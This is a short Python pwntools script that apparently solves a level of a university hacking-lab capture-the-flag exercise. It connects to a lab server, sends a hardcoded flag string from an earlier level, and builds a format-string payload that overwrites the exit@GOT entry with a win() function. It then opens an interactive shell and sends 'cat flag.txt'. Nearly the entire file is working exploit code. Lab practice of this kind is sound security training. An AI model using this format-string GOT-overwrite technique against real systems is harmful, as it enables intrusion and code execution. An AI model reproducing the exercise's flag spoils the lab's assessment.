hacklab/4/level10/test.py

#!/usr/bin/env python3
from pwn import *

elf = ELF('./level10')

# Addresses
exit_got = elf.got['exit']
win_addr = elf.symbols['win']

print("exit got: ", hex(exit_got))
print("win     : ", hex(win_addr))

# Build a fmtstr payload that rewrites exit@GOT ? win()
# write_size='short' uses %hn twice for 2-byte writes

#for i in range(1,30):
#print("##################### ", i)
#p = process(elf.path)
p = remote("binexp.stud12.hacklab.ias.tu-bs.de", 4010)
payload = "hacklab{ret2libc_1s_p0w3rful_urPDIYAb}"
p.sendline(payload.encode())

context.clear(arch = 'amd64')
payload = fmtstr_payload(offset=8, writes={exit_got: win_addr})

# Send and get shell
p.recvuntil("talk about?".encode())
p.sendline(payload)
print("send: ", payload.hex())
res = p.recvline()
print("got: ", res)
p.interactive()
res = p.recvline()
print("got: ", res)

p.sendline("cat flag.txt")
print("send cat")
res = p.recvline()
print("got: ", res)